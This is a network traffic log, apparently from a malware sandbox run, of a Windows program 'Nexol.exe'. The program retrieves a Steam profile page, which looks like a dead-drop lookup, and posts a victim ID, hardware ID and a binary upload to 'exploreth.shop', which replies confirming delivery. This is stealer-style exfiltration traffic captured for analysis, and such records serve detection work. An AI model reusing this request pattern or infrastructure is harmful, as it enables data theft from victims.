2025-03-11 22:59:27 UTC	11144	IN	Data Raw: 3b 45 52 45 41 4c 4d 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 4c 4f 47 49 4e 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 41 56 41 54 41 52 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 76 61 74 61 72 73 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 53 45 5f Data Ascii: ;EREALM":1,"LOGIN_BASE_URL":"https:\/\/login.steampowered.com\/","AVATAR_BASE_URL":"https:\/\/avatars.fastly.steamstatic.com\/","FROM_WEB":true,"WEBSITE_ID":"Community","BASE_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49724	104.21.16.1	443	7876	C:\Users\user\Desktop\Nexol.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 22:59:29 UTC	264	OUT	POST /gJKDA HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 65 Host: exploreth.shop
2025-03-11 22:59:29 UTC	65	OUT	Data Raw: 75 69 64 3d 37 65 31 66 62 63 32 38 35 30 34 33 64 32 33 62 61 32 65 33 31 34 66 34 66 66 38 30 62 63 36 64 61 37 39 66 39 36 61 61 35 64 34 62 38 65 61 31 33 62 31 39 37 39 34 30 26 63 69 64 3d Data Ascii: uid=7e1fbc285043d23ba2e314f4ff80bc6da79f96aa5d4b8ea13b197940&cid=
2025-03-11 22:59:30 UTC	784	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 22:59:30 GMT Content-Type: application/octet-stream Content-Length: 14134 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qbbWaVeGHniaUEc0xSxwASBHL%2FqWsJZXx2IESk2x54kBv9WabctOCpUmHvGleNPraVsmBAeIxw3FIOovtz0VrIYs0cadc3meJYNbx61kPVHa%2B34HdMusDbv4BKtSFHmp2Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91eea99f6853058b-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=25018&min_rtt=23048&rtt_var=8917&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=965&delivery_rate=91607&cwnd=172&unsent_bytes=0&cid=6dcc693865e7b0d2&ts=1391&x=0"
2025-03-11 22:59:30 UTC	1369	IN	Data Raw: 33 f6 cb c3 44 eb 47 6a 27 28 ef 32 db 44 d4 10 28 6e 18 58 17 a1 eb 0e 50 bd a0 ae 57 eb d4 8f 2c 33 43 f7 3c fb 62 db 26 8d 75 c6 e6 72 73 f2 c1 f7 1c e4 86 7a 8c 0c e7 a5 19 5b b4 f2 39 5a 16 75 ad 82 39 ad c2 4b 4d 3c 19 e4 e0 a5 78 26 ba 34 52 18 05 cf de 51 f7 26 49 2d 39 4c f7 a1 58 d6 26 a0 32 19 63 c6 34 c9 79 3a 97 b2 66 0c 9b e8 29 79 6c a2 28 ea 2f 18 65 b4 cb 76 e4 df e1 39 25 95 be 4b 67 aa ab 9a 0c 54 ba b3 fb ce ed 31 be ea c8 ad 0d 69 ef 5c 62 c9 a0 13 a7 ed 4c 58 17 42 60 b2 6d 0b 2c 99 b0 fb 0b e3 12 21 d2 81 d4 b6 6f 86 4b d1 eb eb f6 e4 df a5 51 22 74 c3 f2 bf 09 da 42 1d 2c 5e cb d2 75 82 d1 69 03 6e 58 e7 0b 27 cc 2e 9f dc d9 e7 bc 48 f0 46 12 60 9c 8c 2f a4 fe d9 a3 6e 21 a1 65 bd 04 c5 6f c6 11 37 87 60 11 56 31 8b 74 eb 2b d6 b3 Data Ascii: 3DGj'(2D(nXPW,3C<b&ursz[9Zu9KM<x&4RQ&I-9LX&2c4y:f)yl(/ev9%KgT1i\bLXB`m,!oKQ"tB,^uinX'.HF`/n!eo7`V1t+
2025-03-11 22:59:30 UTC	1369	IN	Data Raw: 43 15 ee a4 f5 36 46 43 90 da 88 5a 94 6f 25 08 92 4c 76 32 81 79 f8 f4 a3 ef 0a 4b 54 1c c5 8b 6d f7 3b 15 eb 54 c2 2c f9 e3 a7 b3 6f ae f9 19 7e 61 25 46 40 20 46 19 1c 07 41 2e 61 6f 7d b5 7f 01 65 e5 ac d4 ac fc 65 01 1c 68 2e da d6 24 b9 d0 9d 4c 88 d5 bb f3 96 d8 ce 13 d4 87 39 43 9a 71 bc 0f 0e 55 1e c8 bc b8 ce 49 ff 5d 83 3f f9 ad 43 77 3c e0 8f c7 d0 2f a1 c4 7e 14 12 e2 88 a9 0e dc 56 52 c1 a9 7d 67 85 26 72 3a c0 50 67 59 bc ac 44 b8 9e 38 82 3b 64 2f 14 3a 80 69 6b fb 10 02 d6 bf 4e d2 a9 9a f5 f9 d3 c6 29 7b ba f5 ad ba c6 e4 01 38 d8 c8 e4 25 f7 4f 8b e7 1d 4c a2 06 0f 4d 64 50 63 49 e4 5c df 9d a8 11 ab 20 64 80 13 95 13 a0 b9 17 6a fc bc 6f 4a 1a 56 49 a5 12 57 2a 70 ee b2 79 1c 15 66 64 99 49 4a 5e 07 5c c4 bd 06 67 92 b8 9c 0e a7 0c 3a Data Ascii: C6FCZo%Lv2yKTm;T,o~a%F@ FA.ao}eeh.$L9CqUI]?Cw</~VR}g&r:PgYD8;d/:ikN){8%OLMdPcI\ djoJVIW*pyfdIJ^\g:
2025-03-11 22:59:30 UTC	1369	IN	Data Raw: 19 6f 16 e0 a1 88 57 8d ba 95 61 2a ba 78 44 ab 87 76 d7 30 92 b9 d4 42 a5 fe 8d 74 c5 1e d9 5f 2c c5 5d 70 b1 85 cb 68 ff 1f 23 99 9c 49 b5 e9 90 38 3b 81 42 45 d7 db a0 93 8e 75 3e 88 8f 8b 8c 2c 74 30 5a 72 2b b6 83 61 db ae 50 8e 84 05 1a d5 a9 8c 52 ad b5 8c 55 a4 f6 46 69 2a 97 f6 01 ad 3e 52 5f b7 db 16 53 0a 94 7c e5 67 b0 7f 7b 48 43 e0 a4 21 1a fa 97 3e fa 03 89 ac 7e 3a c8 24 6a bb b1 a4 a6 32 f7 40 8f 8b d8 fe 34 8f 82 2f b2 f1 47 a7 9c 19 46 fa b8 0b a0 8d b3 aa 7e 35 35 36 ae 77 67 80 14 5d 9c ba c0 aa 81 0a 61 6d 8e c2 64 cf ca b3 9f 3c 83 c9 da d0 c9 48 e3 88 82 15 49 88 b4 81 8f 33 25 b5 f7 f4 e8 2a 9c 87 26 22 1f 0f dd 2f 7e f4 6a 4b 8d 94 71 ed 15 06 4b 96 a2 ff 60 0f e8 73 0f 04 b4 8d 02 e4 a7 fa 38 0b c1 94 31 4a ef 2c de 69 58 12 04 Data Ascii: oWaxDv0Bt_,]ph#I8;BEu>,t0Zr+aPRUFi>R_S\|g{HC!>~:$j2@4/GF~556wg]amd<HI3%*&"/~jKqK`s81J,iX
2025-03-11 22:59:30 UTC	1369	IN	Data Raw: 70 30 5b c6 3f 4f 46 9b 14 cd fc 96 23 92 9f d7 39 83 c0 7e 3f 92 39 dd 20 3f 7b f6 b7 df 7a 89 9f 3a 00 68 59 fd f8 d4 1e 8f 8b 26 c1 a0 67 7d 06 65 51 a2 53 fa 3d 46 f9 1b 72 d3 f2 9e ee 73 cf 2d e6 b0 97 39 29 aa 03 77 23 10 39 7d a2 07 50 49 e8 2f 6c 97 85 c5 9a ee 51 58 bb 3d db 2d ed 38 05 8e f7 d5 6f ae b3 c6 86 f7 b3 1f 21 d7 ed fc 53 63 4a 1b 41 eb b8 31 c5 f8 b9 2a ba 91 f8 de 26 c9 7e 22 71 c1 d1 77 21 57 4c 8f a0 93 25 96 f7 b3 b1 ac 5c 90 0a 49 a8 31 17 91 fd b1 31 5b 5d c5 c6 21 a3 3b 1e 4c 03 da ed ea ae 45 ca 93 80 2d 83 78 1d 03 04 c2 3d a2 52 c3 5c b7 f3 4c 92 20 b8 f5 c4 1b fd d5 aa 02 56 d8 cb 40 a8 1f 2e 6a ae 1d da 9e 1e 9a 03 26 e8 bf e0 ac 41 3e fa 28 3c 6b 07 97 26 85 37 fa 1a 89 1a 3f dd dd 76 43 b1 bb 94 72 50 72 2a 59 0d e5 e9 Data Ascii: p0[?OF#9~?9 ?{z:hY&g}eQS=Frs-9)w#9}PI/lQX=-8o!ScJA1&~"qw!WL%\I11[]!;LE-x=R\L V@.j&A>(<k&7?vCrPrY
2025-03-11 22:59:30 UTC	1369	IN	Data Raw: ec 79 0c 4d 57 a2 cc f3 96 c9 a6 83 55 dc df 21 c0 79 ea 64 f7 29 1c 29 74 8d e4 f8 a6 c4 d5 f3 45 2a d9 7c d8 40 d0 c8 cd 17 83 b6 fc 2b a6 e3 1d cd 4f 3c 1f d1 75 32 70 9c 9f 66 b4 ec d6 18 3d d2 3c 04 0a e6 a2 4b 50 a9 00 31 8a 6b 81 70 12 9a 64 9b 5e 57 4c e5 c6 ae bb 6b 44 0f 5c f9 ed fd 34 f0 71 a4 2d 5f 48 4a f9 40 9f fd 9b 04 c9 af 55 28 ef 95 5a 2d ba e5 91 67 34 a3 2e 5d 66 9e 5c aa 9c 03 b7 65 90 a5 22 89 1d b0 b5 b0 25 16 f8 dc e0 f7 24 25 28 81 5c e8 9a 90 30 ac ad 25 c2 3b cc ee f9 a0 ad 43 60 ae 0c 04 1a 54 21 bc 0c 58 f7 19 2b 96 99 61 44 fb 8d 3c 5d 0b 62 13 36 3f d1 ed 86 d2 db a2 85 a9 db af ed 09 ca 1e 28 1f 4c d6 8e 22 33 e1 cb aa 87 55 58 7a df bd da b8 33 f8 27 b2 eb ab 69 97 66 c5 66 80 6d 34 ba 4a 29 ef 89 df 6d 27 ca ef 2a f1 fc Data Ascii: yMWU!yd))tE\|@+O<u2pf=<KP1kpd^WLkD\4q-_HJ@U(Z-g4.]f\e"%$%(\0%;C`T!X+aD<]b6?(L"3UXz3'iffm4J)m'
2025-03-11 22:59:30 UTC	1369	IN	Data Raw: 46 1a a8 f5 00 e7 71 f3 70 27 90 69 17 c9 9b f9 5a 44 c4 15 96 23 31 47 d8 7c 14 f7 51 8d ab 2c 3c 77 d3 f5 5e 2e 59 da 2a 79 f6 0c 83 a1 92 79 23 a5 80 ea 9c 37 c2 33 9f fc ee 1b 6a b0 c6 98 16 bd f8 fe c5 70 73 42 5c 26 a4 09 88 ec 59 fb 2e a4 7c 99 3b 53 82 e3 28 51 7a 75 3a a5 a6 dc e8 17 d1 1a 10 44 97 21 c5 02 8b 97 be f4 7f f8 df 4a 84 67 5d 8c f1 9b 86 43 db 5a 41 6a a8 e0 91 d8 41 f1 2e e6 33 0a 73 a2 8a ea 97 ca 52 e1 51 57 14 8a b7 3c 6f 47 88 05 3f da 57 01 0f 2a e3 08 79 de 3a 90 15 cf 28 40 ab 86 7d 3a 2f d8 84 aa e6 93 8b a6 cd 75 03 c8 51 ba e0 10 8d 91 07 21 00 d5 2f 32 64 34 44 31 b8 d8 1d dd 99 d1 fb 34 5a c9 96 c4 21 30 1b 1f 87 f4 ff 16 29 7f 13 4d 9d 17 66 94 a6 f0 85 0c 0f c6 6d ab 3c 8d 6e c2 5a 81 95 94 14 58 3f 67 65 72 da 4c 23 Data Ascii: Fqp'iZD#1G\|Q,<w^.Yyy#73jpsB\&Y.\|;S(Qzu:D!Jg]CZAjA.3sRQW<oG?Wy:(@}:/uQ!/2d4D14Z!0)Mfm<nZX?gerL#
2025-03-11 22:59:30 UTC	1369	IN	Data Raw: 43 f7 84 a6 17 83 a2 d1 7f ca 89 08 a3 7e 6d 55 9a b8 41 f7 c8 5c 5f 58 ce 6e ce d3 af 8a be c6 cd e2 c8 97 cd 98 6c 45 0c 99 87 93 52 76 bb 62 c7 92 a2 13 27 7d 47 18 f4 78 f7 e9 59 a9 7b 93 8d c7 fc 32 70 27 f0 f5 2b 11 44 d2 6e 54 80 59 10 d4 0f c7 b8 20 2e 4c a0 7e fa 47 32 96 9b 57 f0 6b 0c 9f 14 78 7f 9f d1 b8 96 42 a2 da 38 12 ec 3f c9 93 4f 41 f9 fc 85 fe 7d ad 82 80 44 b4 5b d4 5a 86 81 55 96 2d ee 2b c2 ab a5 89 04 92 8b 04 97 3c 68 d2 47 56 c7 93 a6 dc d0 c4 2d ed 6b 83 26 a4 b5 e4 1f 02 cc be 83 ed ef d5 5b fe af aa 3d 1e a8 de ba 78 17 5c 37 69 e2 17 15 4a 3e 32 75 4d bb df e6 f9 d1 f0 9f 27 5e dd b3 0a 3a 5b 11 e7 df 9f 1e 91 41 51 79 39 34 af 4b 08 02 c1 90 b2 44 f7 e7 c1 22 f3 33 a7 50 36 e8 1e 21 e9 e4 4e 04 a5 84 48 e8 56 1a f8 e5 ae ed Data Ascii: C~mUA\_XnlERvb'}GxY{2p'+DnTY .L~G2WkxB8?OA}D[ZU-+<hGV-k&[=x\7iJ>2uM'^:[AQy94KD"3P6!NHV
2025-03-11 22:59:30 UTC	1369	IN	Data Raw: 68 df a1 12 ca ea 07 d2 59 24 2c 4e 24 81 e2 7e 22 a8 c2 0d 39 f4 2e 39 8f bb 04 1f 2a 8b 17 83 b5 40 9b 54 3a ed fb 39 c2 83 a7 0d 1f 0c aa 1b 2f ea e1 cf 6f 5f f6 2b a9 06 fe 67 f1 5e 55 81 e5 c1 34 3b a2 e7 b2 ea 46 12 00 a3 bf bb 9b d0 28 ae 1d de 13 16 aa 71 66 99 10 ae 40 35 71 d0 23 84 9a d6 b7 e8 a4 c7 61 7e 9d c7 87 c2 ec a0 24 2d c6 85 d1 a3 a5 67 45 0f c4 00 f0 29 07 fe 96 42 8b 9c ae b4 2f 05 d6 cf 84 79 5d 4f 6b 42 a7 cf 18 4b f8 09 d4 3a 58 6b 5e fc 88 33 a3 d2 c2 b1 5d 2a 2d 47 aa 5c dd 30 aa 23 7e 2f 4e bd b5 5e 90 be 1a 8d aa 59 2b ff bd 21 79 0c ac 5d 06 5d 4d c7 bb 1f 3b 8d 62 12 dc 02 76 c1 a8 d2 08 33 0a fc 67 17 23 a2 61 d2 f6 e5 a3 dd e3 a1 9c 18 5d 47 38 7b 44 14 f0 72 f2 b1 bc a7 b9 ec 84 45 22 ca 96 35 7e f1 ba 21 5e a8 b3 7c b8 Data Ascii: hY$,N$~"9.9@T:9/o_+g^U4;F(qf@5q#a~$-gE)B/y]OkBK:Xk^3]-G\0#~/N^Y+!y]]M;bv3g#a]G8{DrE"5~!^\|
2025-03-11 22:59:30 UTC	1369	IN	Data Raw: 42 23 61 06 bb 47 f9 b5 fe cd de ef 46 0e eb f1 6a a0 c3 df 14 2b e3 99 54 92 bc fc 08 f2 c6 c6 19 0c 18 05 e3 8c 60 6b 43 f1 aa 3d 4e d7 a8 e2 27 ea a3 43 cc ef 13 ee 13 2d d1 c7 8f 0f 08 2d 42 bd f4 5a f3 96 60 bd 81 01 0d b9 1d 8b 1f d9 b8 35 72 68 3c bd 72 6e 50 7b 59 dd e3 28 38 e6 12 d8 34 3a 50 54 e1 70 ca 96 6f b5 e3 72 4d 0c e5 4d b5 0a 4b 35 37 c4 92 d9 db c6 57 3a 2a 1e 03 d9 7e 5b 0c ea 34 72 b3 9b a6 20 ad 98 d8 da 2c 73 c8 ae 06 62 cd 31 9e 2a cb e1 0b 90 e9 56 1f 84 fa 9d 45 25 6c 0e d8 71 93 0a 2b 13 dc f2 8a 6f 09 8a af bd c0 96 fa 72 30 40 82 46 54 81 9a df 92 e5 ce 6d b3 f4 a1 34 40 24 55 9d bb 3f f7 4f 18 c3 74 c6 d4 f2 4f 4a 82 1b 85 f1 58 89 9a 20 a1 52 be 06 eb 0a e0 83 f5 1c b4 c3 ee 8c 2e c2 db e2 7f 89 c9 e2 e3 a3 2a 3c 0e c1 38 Data Ascii: B#aGFj+T`kC=N'C--BZ`5rh<rnP{Y(84:PTporMMK57W:~[4r ,sb1VE%lq+or0@FTm4@$U?OtOJX R.*<8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49729	23.197.127.21	443	7876	C:\Users\user\Desktop\Nexol.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 22:59:32 UTC	94	OUT	GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com
2025-03-11 22:59:33 UTC	1962	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 11 Mar 2025 22:59:33 GMT Content-Length: 35720 Connection: close Set-Cookie: sessionid=f0ca7672198a9489068f6a0a; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cc0f181fbe5ce05fc270cb5f240b10db6; path=/; secure; HttpOnly; SameSite=None
2025-03-11 22:59:33 UTC	14422	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 22:59:33 UTC	10154	IN	Data Raw: 3d 22 73 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 63 6f 6e 74 65 6e 74 3d 22 2e 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 43 4f 4d 4d 55 4e 49 54 59 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 69 64 3d 22 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 09 09 48 6f 6d 65 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: ="selector" data-tooltip-content=".submenu_Community">COMMUNITY</a><div class="submenu_Community" style="display: none;" data-submenuid="Community"><a class="submenuitem" href="https://steamcommunity.com/">Home
2025-03-11 22:59:33 UTC	11144	IN	Data Raw: 3b 45 52 45 41 4c 4d 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 4c 4f 47 49 4e 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 41 56 41 54 41 52 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 76 61 74 61 72 73 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 53 45 5f Data Ascii: ;EREALM":1,"LOGIN_BASE_URL":"https:\/\/login.steampowered.com\/","AVATAR_BASE_URL":"https:\/\/avatars.fastly.steamstatic.com\/","FROM_WEB":true,"WEBSITE_ID":"Community","BASE_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49730	104.21.16.1	443	7876	C:\Users\user\Desktop\Nexol.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 22:59:41 UTC	272	OUT	POST /gJKDA HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=I6jsBPlE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19585 Host: exploreth.shop
2025-03-11 22:59:41 UTC	15331	OUT	Data Raw: 2d 2d 49 36 6a 73 42 50 6c 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 65 31 66 62 63 32 38 35 30 34 33 64 32 33 62 61 32 65 33 31 34 66 34 66 66 38 30 62 63 36 64 61 37 39 66 39 36 61 61 35 64 34 62 38 65 61 31 33 62 31 39 37 39 34 30 0d 0a 2d 2d 49 36 6a 73 42 50 6c 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 36 6a 73 42 50 6c 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 37 33 46 38 39 43 46 41 39 31 39 39 34 31 37 41 36 Data Ascii: --I6jsBPlEContent-Disposition: form-data; name="uid"7e1fbc285043d23ba2e314f4ff80bc6da79f96aa5d4b8ea13b197940--I6jsBPlEContent-Disposition: form-data; name="pid"2--I6jsBPlEContent-Disposition: form-data; name="hwid"EA73F89CFA9199417A6
2025-03-11 22:59:41 UTC	4254	OUT	Data Raw: 4f ed 54 12 34 7b 93 19 93 30 bf 31 8f fd d7 41 79 92 e2 83 d0 ab e6 01 f0 eb c0 01 51 32 d8 7c 8a 23 7b 82 a8 41 c8 a9 a6 5c c1 a7 9b 9f cc 1f d8 eb 0f 6b 19 59 8a 41 df 8a 44 6e 7a 1a b3 37 53 9e 10 7a 01 f0 e0 93 13 bb 86 11 40 4a 4f 4b 69 46 c6 bb dd 42 02 e7 93 93 76 fd 77 9b 47 03 c0 f9 6a 93 ae 46 ff 3e 30 f9 72 48 ec e5 82 ae 92 02 25 ef 3d d0 71 79 7b 25 6d 11 81 bc 10 4d 14 22 50 ad 1b c0 6e 61 c5 19 9c a6 ec cf 5e a4 79 be 75 dc 0a 05 d3 37 77 91 cc 85 42 f5 a4 65 99 44 4a 4a a8 f0 86 24 f9 49 c1 c3 3d 8b 13 29 6b 22 5f 41 36 ee 72 6c 34 b0 8e 72 e8 9b 62 02 9b ba 53 ce ee 28 32 05 bc 35 bc e5 03 74 5d be 9d 8b fd 02 84 06 27 4c 88 d7 54 8f 4a eb 26 c9 fa 66 1b 3a 0a 20 2e 7f 80 48 be 12 86 17 4e 73 9f f5 19 70 c5 49 e0 c9 ae b4 5d 63 5f 7d e8 Data Ascii: OT4{01AyQ2\|#{A\kYADnz7Sz@JOKiFBvwGjF>0rH%=qy{%mM"Pna^yu7wBeDJJ$I=)k"_A6rl4rbS(25t]'LTJ&f: .HNspI]c_}
2025-03-11 22:59:42 UTC	816	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 22:59:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pPeb%2BkY9SWW27giGQfd0BfE8RLpzZOmoSLjwp1KJ4faYaBbre2YVvnSyDTJMKncbjOdbRqJgETktPtfO0OdmUbsy%2FKk0XNBDH0PMTlcHyZbzwtW23uzn473FedBbIn9dBg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91eea9e7ac3ec599-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=42267&min_rtt=34654&rtt_var=16580&sent=15&recv=22&lost=0&retrans=0&sent_bytes=2831&recv_bytes=20537&delivery_rate=83552&cwnd=222&unsent_bytes=0&cid=bced59f2ee2e68ab&ts=882&x=0"
2025-03-11 22:59:42 UTC	75	IN	Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 32 38 2e 38 39 2e 31 33 32 22 7d 7d 0d 0a Data Ascii: 45{"success":{"message":"message success delivery from 73.128.89.132"}}
2025-03-11 22:59:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49731	23.197.127.21	443	7876	C:\Users\user\Desktop\Nexol.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 22:59:43 UTC	94	OUT	GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com
2025-03-11 22:59:44 UTC	1962	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: 